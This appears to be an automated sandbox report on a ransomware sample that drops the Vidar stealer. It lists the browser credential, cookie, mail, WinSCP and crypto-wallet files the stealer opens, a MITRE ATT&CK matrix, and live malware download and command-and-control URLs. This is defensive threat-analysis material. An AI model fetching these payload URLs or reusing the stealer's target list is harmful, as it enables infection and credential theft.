Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Cookies\Edge_Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Cookies\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Cookies\IE_Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Downloads\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Files\DESKTOP.zip VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\History\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\information.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\outlook.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\passwords.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\screenshot.jpg VolumeInformation

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 2_2_00427756 cpuid

2_2_00427756

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

0_2_0040A321

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_0042FE47

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

2_2_00419F90

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

0_2_00409E23

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 14.2.build2.exe.21615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.build2.exe.21615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 2304, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Found many strings related to Crypto-Wallets (likely being stolen)

Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: JaxxLiberty
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\window-state.jsonoC*
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: build2.exe, 00000010.00000002.537262036.0000000002277000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: build2.exe, 00000010.00000002.537262036.0000000002277000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Wallets\MultiDoge
Source: build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: build2.exe, 00000010.00000002.537262036.0000000002277000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: build2.exe, 00000010.00000002.568890891.00000000328AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match	File source: 14.2.build2.exe.21615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.build2.exe.21615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 2304, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 14.2.build2.exe.21615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.build2.exe.21615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 2304, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	2 Native API	1 Services File Permissions Weakness	211 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	3 Command and Scripting Interpreter	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Services File Permissions Weakness	1 Software Packing	NTDS	56 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	15 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	211 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	12 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Q5W0I0pzFI.exe	33%	Virustotal		Browse
Q5W0I0pzFI.exe	38%	ReversingLabs	Win32.Ransomware.StopCrypt
Q5W0I0pzFI.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\mozglue[1].dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\vcruntime140[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.2.build2.exe.21615a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.0.Q5W0I0pzFI.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
16.0.build2.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1224175	Download File
8.2.Q5W0I0pzFI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.2.Q5W0I0pzFI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.Q5W0I0pzFI.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
11.2.Q5W0I0pzFI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
16.0.build2.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1224175	Download File
17.0.Q5W0I0pzFI.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
16.0.build2.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1224175	Download File
17.2.Q5W0I0pzFI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.Q5W0I0pzFI.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.Q5W0I0pzFI.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.Q5W0I0pzFI.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
2.2.Q5W0I0pzFI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
16.2.build2.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1224185	Download File
16.0.build2.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1224175	Download File
16.0.build2.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1224175	Download File
17.0.Q5W0I0pzFI.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1223627	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://fuyt.org/files/1/build3.exeT	100%	Avira URL Cloud	malware
http://5.252.23.88/msvcp140.dll	0%	Virustotal		Browse
http://5.252.23.88/msvcp140.dll	0%	Avira URL Cloud	safe
http://5.252.23.88/freebl3.dll(l	0%	Avira URL Cloud	safe
http://5.252.23.88/vcruntime140.dllFLw	0%	Avira URL Cloud	safe
http://fuyt.org/files/1/build3.exeX	100%	Avira URL Cloud	malware
http://zerit.top/dl/build2.exe	100%	Avira URL Cloud	malware
http://fuyt.org/files/1/build3.exe	100%	Avira URL Cloud	malware
http://5.252.23.88/softokn3.dll	0%	Avira URL Cloud	safe
http://5.252.23.88/3	0%	Avira URL Cloud	safe
http://5.252.23.88/freebl3.dll	0%	Avira URL Cloud	safe
http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true	100%	Avira URL Cloud	malware
http://5.252.23.88/nss3.dll)b	0%	Avira URL Cloud	safe
https://we.tl/t-0S984cQ4	0%	Avira URL Cloud	safe
https://we.tl/t-0S984cQ4B3	0%	Avira URL Cloud	safe
http://5.252.23.88/nss3.dll	0%	Avira URL Cloud	safe
http://fuyt.org/files/1/build3.execm	100%	Avira URL Cloud	malware
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
http://5.252.23.88/	0%	Avira URL Cloud	safe
http://5.252.23.88/vcruntime140.dll	0%	Avira URL Cloud	safe
http://5.252.23.88/vcruntime140.dll~L	0%	Avira URL Cloud	safe
http://5.252.23.88/mozglue.dll	0%	Avira URL Cloud	safe
http://5.252.23.88/517	0%	Avira URL Cloud	safe
http://fuyt.org/files/1/build3.exe&	100%	Avira URL Cloud	malware
http://www.wikipedia.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fuyt.org	183.78.205.92	true	false	high
t.me	149.154.167.99	true	false	high
api.2ip.ua	162.0.218.244	true	false	high
zerit.top	183.78.205.92	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://5.252.23.88/msvcp140.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://zerit.top/dl/build2.exe	true	Avira URL Cloud: malware	unknown
http://fuyt.org/files/1/build3.exe	true	Avira URL Cloud: malware	unknown
http://5.252.23.88/softokn3.dll	true	Avira URL Cloud: safe	unknown
http://5.252.23.88/freebl3.dll	true	Avira URL Cloud: safe	unknown
http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.json	false		high
http://5.252.23.88/nss3.dll	true	Avira URL Cloud: safe	unknown
http://5.252.23.88/	true	Avira URL Cloud: safe	unknown
http://5.252.23.88/vcruntime140.dll	true	Avira URL Cloud: safe	unknown
http://5.252.23.88/mozglue.dll	true	Avira URL Cloud: safe	unknown
https://t.me/hi20220328	false		high
http://5.252.23.88/517	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fuyt.org/files/1/build3.exeT	Q5W0I0pzFI.exe, 00000008.00000002.629017228.0000000002F82000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://t.me/	build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	false		high
http://5.252.23.88/freebl3.dll(l	build2.exe, 00000010.00000002.537111243.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://5.252.23.88/vcruntime140.dllFLw	build2.exe, 00000010.00000002.537111243.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fuyt.org/files/1/build3.exeX	Q5W0I0pzFI.exe, 00000008.00000002.628986067.0000000002F6D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.nytimes.com/	Q5W0I0pzFI.exe, 00000008.00000003.463081877.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/	Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonvP	Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
http://5.252.23.88/3	build2.exe, 00000010.00000002.537111243.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://telegram.org/img/t_logo.png	build2.exe, 00000010.00000003.451522727.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/b6W	Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
